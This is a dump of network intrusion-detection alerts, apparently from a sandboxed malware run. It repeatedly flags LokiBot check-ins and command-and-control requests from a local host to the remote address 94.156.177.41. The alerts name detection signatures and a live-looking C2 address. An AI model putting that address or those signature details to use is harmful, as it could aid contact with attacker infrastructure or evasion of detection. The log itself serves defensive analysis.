                            2025-01-11T07:45:29.977511+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55004994.156.177.4180TCP
                            2025-01-11T07:45:29.977511+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55004994.156.177.4180TCP
                            2025-01-11T07:45:30.122846+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55005094.156.177.4180TCP
                            2025-01-11T07:45:30.122846+01002025381ET MALWARE LokiBot Checkin1192.168.2.55005094.156.177.4180TCP
                            2025-01-11T07:45:30.122846+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55005094.156.177.4180TCP
                            2025-01-11T07:45:30.838290+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55005094.156.177.4180TCP
                            2025-01-11T07:45:30.838290+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55005094.156.177.4180TCP
                            2025-01-11T07:45:30.991478+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55005194.156.177.4180TCP
                            2025-01-11T07:45:30.991478+01002025381ET MALWARE LokiBot Checkin1192.168.2.55005194.156.177.4180TCP
                            2025-01-11T07:45:30.991478+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55005194.156.177.4180TCP
                            2025-01-11T07:45:31.709287+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55005194.156.177.4180TCP
                            2025-01-11T07:45:31.709287+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55005194.156.177.4180TCP
                            2025-01-11T07:45:31.859651+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55005294.156.177.4180TCP
                            2025-01-11T07:45:31.859651+01002025381ET MALWARE LokiBot Checkin1192.168.2.55005294.156.177.4180TCP
                            2025-01-11T07:45:31.859651+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55005294.156.177.4180TCP
                            2025-01-11T07:45:32.579246+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55005294.156.177.4180TCP
                            2025-01-11T07:45:32.579246+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55005294.156.177.4180TCP
                            2025-01-11T07:45:32.741029+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55005394.156.177.4180TCP
                            2025-01-11T07:45:32.741029+01002025381ET MALWARE LokiBot Checkin1192.168.2.55005394.156.177.4180TCP
                            2025-01-11T07:45:32.741029+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55005394.156.177.4180TCP
                            2025-01-11T07:45:33.462401+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55005394.156.177.4180TCP
                            2025-01-11T07:45:33.462401+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55005394.156.177.4180TCP
                            2025-01-11T07:45:33.607086+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55005494.156.177.4180TCP
                            2025-01-11T07:45:33.607086+01002025381ET MALWARE LokiBot Checkin1192.168.2.55005494.156.177.4180TCP
                            2025-01-11T07:45:33.607086+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55005494.156.177.4180TCP
                            2025-01-11T07:45:34.323221+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55005494.156.177.4180TCP
                            2025-01-11T07:45:34.323221+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55005494.156.177.4180TCP
                            2025-01-11T07:45:34.487775+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55005594.156.177.4180TCP
                            2025-01-11T07:45:34.487775+01002025381ET MALWARE LokiBot Checkin1192.168.2.55005594.156.177.4180TCP
                            2025-01-11T07:45:34.487775+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55005594.156.177.4180TCP
                            2025-01-11T07:45:35.186639+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55005594.156.177.4180TCP
                            2025-01-11T07:45:35.186639+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55005594.156.177.4180TCP
                            2025-01-11T07:45:35.345550+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55005694.156.177.4180TCP
                            2025-01-11T07:45:35.345550+01002025381ET MALWARE LokiBot Checkin1192.168.2.55005694.156.177.4180TCP
                            2025-01-11T07:45:35.345550+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55005694.156.177.4180TCP
                            2025-01-11T07:45:36.073409+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55005694.156.177.4180TCP
                            2025-01-11T07:45:36.073409+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55005694.156.177.4180TCP
                            2025-01-11T07:45:36.525051+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55005794.156.177.4180TCP
                            2025-01-11T07:45:36.525051+01002025381ET MALWARE LokiBot Checkin1192.168.2.55005794.156.177.4180TCP
                            2025-01-11T07:45:36.525051+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55005794.156.177.4180TCP
                            2025-01-11T07:45:37.239895+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55005794.156.177.4180TCP
                            2025-01-11T07:45:37.239895+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55005794.156.177.4180TCP
                            2025-01-11T07:45:37.400062+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55005894.156.177.4180TCP
                            2025-01-11T07:45:37.400062+01002025381ET MALWARE LokiBot Checkin1192.168.2.55005894.156.177.4180TCP
                            2025-01-11T07:45:37.400062+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55005894.156.177.4180TCP
                            2025-01-11T07:45:38.251440+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55005894.156.177.4180TCP
                            2025-01-11T07:45:38.251440+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55005894.156.177.4180TCP
                            2025-01-11T07:45:38.410807+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55005994.156.177.4180TCP
                            2025-01-11T07:45:38.410807+01002025381ET MALWARE LokiBot Checkin1192.168.2.55005994.156.177.4180TCP
                            2025-01-11T07:45:38.410807+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55005994.156.177.4180TCP
                            2025-01-11T07:45:39.138394+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55005994.156.177.4180TCP
                            2025-01-11T07:45:39.138394+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55005994.156.177.4180TCP
                            2025-01-11T07:45:39.302388+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55006094.156.177.4180TCP
                            2025-01-11T07:45:39.302388+01002025381ET MALWARE LokiBot Checkin1192.168.2.55006094.156.177.4180TCP
                            2025-01-11T07:45:39.302388+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55006094.156.177.4180TCP
                            2025-01-11T07:45:40.007540+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55006094.156.177.4180TCP
                            2025-01-11T07:45:40.007540+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55006094.156.177.4180TCP
                            2025-01-11T07:45:40.165796+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55006194.156.177.4180TCP
                            2025-01-11T07:45:40.165796+01002025381ET MALWARE LokiBot Checkin1192.168.2.55006194.156.177.4180TCP
                            2025-01-11T07:45:40.165796+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55006194.156.177.4180TCP
                            2025-01-11T07:45:40.857097+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55006194.156.177.4180TCP
                            2025-01-11T07:45:40.857097+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55006194.156.177.4180TCP
                            2025-01-11T07:45:41.015055+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55006294.156.177.4180TCP
                            2025-01-11T07:45:41.015055+01002025381ET MALWARE LokiBot Checkin1192.168.2.55006294.156.177.4180TCP
                            2025-01-11T07:45:41.015055+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55006294.156.177.4180TCP
                            2025-01-11T07:45:41.732826+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55006294.156.177.4180TCP
                            2025-01-11T07:45:41.732826+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55006294.156.177.4180TCP
                            2025-01-11T07:45:42.032602+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55006394.156.177.4180TCP
                            2025-01-11T07:45:42.032602+01002025381ET MALWARE LokiBot Checkin1192.168.2.55006394.156.177.4180TCP
                            2025-01-11T07:45:42.032602+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55006394.156.177.4180TCP
                            2025-01-11T07:45:42.753857+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55006394.156.177.4180TCP
                            2025-01-11T07:45:42.753857+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55006394.156.177.4180TCP
                            2025-01-11T07:45:42.904942+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55006494.156.177.4180TCP
                            2025-01-11T07:45:42.904942+01002025381ET MALWARE LokiBot Checkin1192.168.2.55006494.156.177.4180TCP
                            2025-01-11T07:45:42.904942+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55006494.156.177.4180TCP
                            2025-01-11T07:45:43.607936+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55006494.156.177.4180TCP
                            2025-01-11T07:45:43.607936+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55006494.156.177.4180TCP
                            2025-01-11T07:45:43.761690+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55006594.156.177.4180TCP
                            2025-01-11T07:45:43.761690+01002025381ET MALWARE LokiBot Checkin1192.168.2.55006594.156.177.4180TCP
                            2025-01-11T07:45:43.761690+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55006594.156.177.4180TCP
                            2025-01-11T07:45:44.450980+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55006594.156.177.4180TCP
                            2025-01-11T07:45:44.450980+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55006594.156.177.4180TCP
                            2025-01-11T07:45:44.721124+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55006694.156.177.4180TCP
                            2025-01-11T07:45:44.721124+01002025381ET MALWARE LokiBot Checkin1192.168.2.55006694.156.177.4180TCP
                            2025-01-11T07:45:44.721124+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55006694.156.177.4180TCP
                            2025-01-11T07:45:45.428851+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55006694.156.177.4180TCP
                            2025-01-11T07:45:45.428851+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55006694.156.177.4180TCP
                            2025-01-11T07:45:45.593770+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55006794.156.177.4180TCP
                            2025-01-11T07:45:45.593770+01002025381ET MALWARE LokiBot Checkin1192.168.2.55006794.156.177.4180TCP
                            2025-01-11T07:45:45.593770+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55006794.156.177.4180TCP
                            2025-01-11T07:45:46.295558+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55006794.156.177.4180TCP
                            2025-01-11T07:45:46.295558+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55006794.156.177.4180TCP
                            2025-01-11T07:45:46.450873+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55006894.156.177.4180TCP
                            2025-01-11T07:45:46.450873+01002025381ET MALWARE LokiBot Checkin1192.168.2.55006894.156.177.4180TCP
                            2025-01-11T07:45:46.450873+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55006894.156.177.4180TCP
                            2025-01-11T07:45:47.180099+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55006894.156.177.4180TCP
                            2025-01-11T07:45:47.180099+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55006894.156.177.4180TCP
                            2025-01-11T07:45:47.341627+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55006994.156.177.4180TCP
                            2025-01-11T07:45:47.341627+01002025381ET MALWARE LokiBot Checkin1192.168.2.55006994.156.177.4180TCP
                            2025-01-11T07:45:47.341627+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55006994.156.177.4180TCP
                            2025-01-11T07:45:48.062041+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55006994.156.177.4180TCP
                            2025-01-11T07:45:48.062041+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55006994.156.177.4180TCP
                            2025-01-11T07:45:48.223334+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55007094.156.177.4180TCP
                            2025-01-11T07:45:48.223334+01002025381ET MALWARE LokiBot Checkin1192.168.2.55007094.156.177.4180TCP
                            2025-01-11T07:45:48.223334+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55007094.156.177.4180TCP
                            2025-01-11T07:45:48.926425+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55007094.156.177.4180TCP
                            2025-01-11T07:45:48.926425+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55007094.156.177.4180TCP
                            2025-01-11T07:45:49.103767+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55007194.156.177.4180TCP
                            2025-01-11T07:45:49.103767+01002025381ET MALWARE LokiBot Checkin1192.168.2.55007194.156.177.4180TCP
                            2025-01-11T07:45:49.103767+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55007194.156.177.4180TCP
                            2025-01-11T07:45:49.824114+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55007194.156.177.4180TCP
                            2025-01-11T07:45:49.824114+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55007194.156.177.4180TCP
                            2025-01-11T07:45:49.999889+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55007294.156.177.4180TCP
                            2025-01-11T07:45:49.999889+01002025381ET MALWARE LokiBot Checkin1192.168.2.55007294.156.177.4180TCP
                            2025-01-11T07:45:49.999889+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55007294.156.177.4180TCP
                            2025-01-11T07:45:50.734862+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55007294.156.177.4180TCP
                            2025-01-11T07:45:50.734862+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55007294.156.177.4180TCP
                            2025-01-11T07:45:50.897746+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55007394.156.177.4180TCP
                            2025-01-11T07:45:50.897746+01002025381ET MALWARE LokiBot Checkin1192.168.2.55007394.156.177.4180TCP
                            2025-01-11T07:45:50.897746+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55007394.156.177.4180TCP
                            2025-01-11T07:45:51.619631+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55007394.156.177.4180TCP
                            2025-01-11T07:45:51.619631+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55007394.156.177.4180TCP
                            2025-01-11T07:45:51.767772+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55007494.156.177.4180TCP
                            2025-01-11T07:45:51.767772+01002025381ET MALWARE LokiBot Checkin1192.168.2.55007494.156.177.4180TCP
                            2025-01-11T07:45:51.767772+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55007494.156.177.4180TCP
                            2025-01-11T07:45:52.455714+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55007494.156.177.4180TCP
                            2025-01-11T07:45:52.455714+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55007494.156.177.4180TCP
                            2025-01-11T07:45:52.610435+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55007594.156.177.4180TCP
                            2025-01-11T07:45:52.610435+01002025381ET MALWARE LokiBot Checkin1192.168.2.55007594.156.177.4180TCP
                            2025-01-11T07:45:52.610435+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55007594.156.177.4180TCP
                            2025-01-11T07:45:53.300650+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55007594.156.177.4180TCP
                            2025-01-11T07:45:53.300650+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55007594.156.177.4180TCP
                            2025-01-11T07:45:53.849528+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55007694.156.177.4180TCP
                            2025-01-11T07:45:53.849528+01002025381ET MALWARE LokiBot Checkin1192.168.2.55007694.156.177.4180TCP
                            2025-01-11T07:45:53.849528+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55007694.156.177.4180TCP
                            2025-01-11T07:45:54.576109+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55007694.156.177.4180TCP
                            2025-01-11T07:45:54.576109+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55007694.156.177.4180TCP
                            2025-01-11T07:45:54.733799+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55007794.156.177.4180TCP
                            2025-01-11T07:45:54.733799+01002025381ET MALWARE LokiBot Checkin1192.168.2.55007794.156.177.4180TCP
                            2025-01-11T07:45:54.733799+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55007794.156.177.4180TCP
                            2025-01-11T07:45:55.483384+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55007794.156.177.4180TCP
                            2025-01-11T07:45:55.483384+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55007794.156.177.4180TCP
                            2025-01-11T07:45:55.638595+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55007894.156.177.4180TCP
                            2025-01-11T07:45:55.638595+01002025381ET MALWARE LokiBot Checkin1192.168.2.55007894.156.177.4180TCP
                            2025-01-11T07:45:55.638595+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55007894.156.177.4180TCP
                            2025-01-11T07:45:56.355282+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55007894.156.177.4180TCP
                            2025-01-11T07:45:56.355282+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55007894.156.177.4180TCP
                            2025-01-11T07:45:56.514453+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55007994.156.177.4180TCP
                            2025-01-11T07:45:56.514453+01002025381ET MALWARE LokiBot Checkin1192.168.2.55007994.156.177.4180TCP
                            2025-01-11T07:45:56.514453+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55007994.156.177.4180TCP
                            2025-01-11T07:45:57.212131+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55007994.156.177.4180TCP
                            2025-01-11T07:45:57.212131+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55007994.156.177.4180TCP
                            2025-01-11T07:45:57.364760+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55008094.156.177.4180TCP
                            2025-01-11T07:45:57.364760+01002025381ET MALWARE LokiBot Checkin1192.168.2.55008094.156.177.4180TCP
                            2025-01-11T07:45:57.364760+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55008094.156.177.4180TCP
                            2025-01-11T07:45:58.216432+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55008094.156.177.4180TCP
                            2025-01-11T07:45:58.216432+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55008094.156.177.4180TCP
                            2025-01-11T07:45:58.382542+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55008194.156.177.4180TCP
                            2025-01-11T07:45:58.382542+01002025381ET MALWARE LokiBot Checkin1192.168.2.55008194.156.177.4180TCP
                            2025-01-11T07:45:58.382542+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55008194.156.177.4180TCP
                            2025-01-11T07:45:59.120917+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55008194.156.177.4180TCP
                            2025-01-11T07:45:59.120917+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55008194.156.177.4180TCP
                            2025-01-11T07:45:59.299658+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55008294.156.177.4180TCP
                            2025-01-11T07:45:59.299658+01002025381ET MALWARE LokiBot Checkin1192.168.2.55008294.156.177.4180TCP
                            2025-01-11T07:45:59.299658+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55008294.156.177.4180TCP
                            2025-01-11T07:45:59.986914+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55008294.156.177.4180TCP
                            2025-01-11T07:45:59.986914+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55008294.156.177.4180TCP
                            2025-01-11T07:46:00.145771+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55008394.156.177.4180TCP
                            2025-01-11T07:46:00.145771+01002025381ET MALWARE LokiBot Checkin1192.168.2.55008394.156.177.4180TCP
                            2025-01-11T07:46:00.145771+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55008394.156.177.4180TCP
                            2025-01-11T07:46:00.838213+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55008394.156.177.4180TCP
                            2025-01-11T07:46:00.838213+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55008394.156.177.4180TCP
                            2025-01-11T07:46:00.982126+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55008494.156.177.4180TCP
                            2025-01-11T07:46:00.982126+01002025381ET MALWARE LokiBot Checkin1192.168.2.55008494.156.177.4180TCP
                            2025-01-11T07:46:00.982126+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55008494.156.177.4180TCP
                            2025-01-11T07:46:01.716963+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55008494.156.177.4180TCP
                            2025-01-11T07:46:01.716963+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55008494.156.177.4180TCP
                            2025-01-11T07:46:01.873444+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55008594.156.177.4180TCP
                            2025-01-11T07:46:01.873444+01002025381ET MALWARE LokiBot Checkin1192.168.2.55008594.156.177.4180TCP
                            2025-01-11T07:46:01.873444+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55008594.156.177.4180TCP
                            2025-01-11T07:46:02.579117+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55008594.156.177.4180TCP
                            2025-01-11T07:46:02.579117+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55008594.156.177.4180TCP
                            2025-01-11T07:46:02.873702+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55008694.156.177.4180TCP
                            2025-01-11T07:46:02.873702+01002025381ET MALWARE LokiBot Checkin1192.168.2.55008694.156.177.4180TCP
                            2025-01-11T07:46:02.873702+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55008694.156.177.4180TCP
                            2025-01-11T07:46:03.569616+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55008694.156.177.4180TCP
                            2025-01-11T07:46:03.569616+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55008694.156.177.4180TCP
                            2025-01-11T07:46:03.722760+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55008794.156.177.4180TCP
                            2025-01-11T07:46:03.722760+01002025381ET MALWARE LokiBot Checkin1192.168.2.55008794.156.177.4180TCP
                            2025-01-11T07:46:03.722760+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55008794.156.177.4180TCP
                            2025-01-11T07:46:04.429247+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55008794.156.177.4180TCP
                            2025-01-11T07:46:04.429247+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55008794.156.177.4180TCP
                            2025-01-11T07:46:04.607701+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55008894.156.177.4180TCP
                            2025-01-11T07:46:04.607701+01002025381ET MALWARE LokiBot Checkin1192.168.2.55008894.156.177.4180TCP
                            2025-01-11T07:46:04.607701+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55008894.156.177.4180TCP
                            2025-01-11T07:46:05.309228+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55008894.156.177.4180TCP
                            2025-01-11T07:46:05.309228+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55008894.156.177.4180TCP
                            2025-01-11T07:46:05.489996+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55008994.156.177.4180TCP
                            2025-01-11T07:46:05.489996+01002025381ET MALWARE LokiBot Checkin1192.168.2.55008994.156.177.4180TCP
                            2025-01-11T07:46:05.489996+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55008994.156.177.4180TCP
                            2025-01-11T07:46:06.196145+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55008994.156.177.4180TCP
                            2025-01-11T07:46:06.196145+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55008994.156.177.4180TCP
                            2025-01-11T07:46:06.353603+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55009094.156.177.4180TCP
                            2025-01-11T07:46:06.353603+01002025381ET MALWARE LokiBot Checkin1192.168.2.55009094.156.177.4180TCP
                            2025-01-11T07:46:06.353603+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55009094.156.177.4180TCP
                            2025-01-11T07:46:07.103223+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55009094.156.177.4180TCP
                            2025-01-11T07:46:07.103223+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55009094.156.177.4180TCP
                            2025-01-11T07:46:07.255437+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55009194.156.177.4180TCP
                            2025-01-11T07:46:07.255437+01002025381ET MALWARE LokiBot Checkin1192.168.2.55009194.156.177.4180TCP
                            2025-01-11T07:46:07.255437+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55009194.156.177.4180TCP
                            2025-01-11T07:46:07.967380+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55009194.156.177.4180TCP
                            2025-01-11T07:46:07.967380+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55009194.156.177.4180TCP
                            2025-01-11T07:46:08.138322+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55009294.156.177.4180TCP
                            2025-01-11T07:46:08.138322+01002025381ET MALWARE LokiBot Checkin1192.168.2.55009294.156.177.4180TCP
                            2025-01-11T07:46:08.138322+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55009294.156.177.4180TCP
                            2025-01-11T07:46:08.856365+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55009294.156.177.4180TCP
                            2025-01-11T07:46:08.856365+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55009294.156.177.4180TCP
                            2025-01-11T07:46:09.033339+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55009394.156.177.4180TCP
                            2025-01-11T07:46:09.033339+01002025381ET MALWARE LokiBot Checkin1192.168.2.55009394.156.177.4180TCP
                            2025-01-11T07:46:09.033339+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55009394.156.177.4180TCP
                            2025-01-11T07:46:09.756222+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55009394.156.177.4180TCP
                            2025-01-11T07:46:09.756222+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55009394.156.177.4180TCP
                            2025-01-11T07:46:09.910608+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55009494.156.177.4180TCP
                            2025-01-11T07:46:09.910608+01002025381ET MALWARE LokiBot Checkin1192.168.2.55009494.156.177.4180TCP
                            2025-01-11T07:46:09.910608+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55009494.156.177.4180TCP
                            2025-01-11T07:46:10.621993+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55009494.156.177.4180TCP
                            2025-01-11T07:46:10.621993+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55009494.156.177.4180TCP
                            2025-01-11T07:46:10.798044+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55009594.156.177.4180TCP
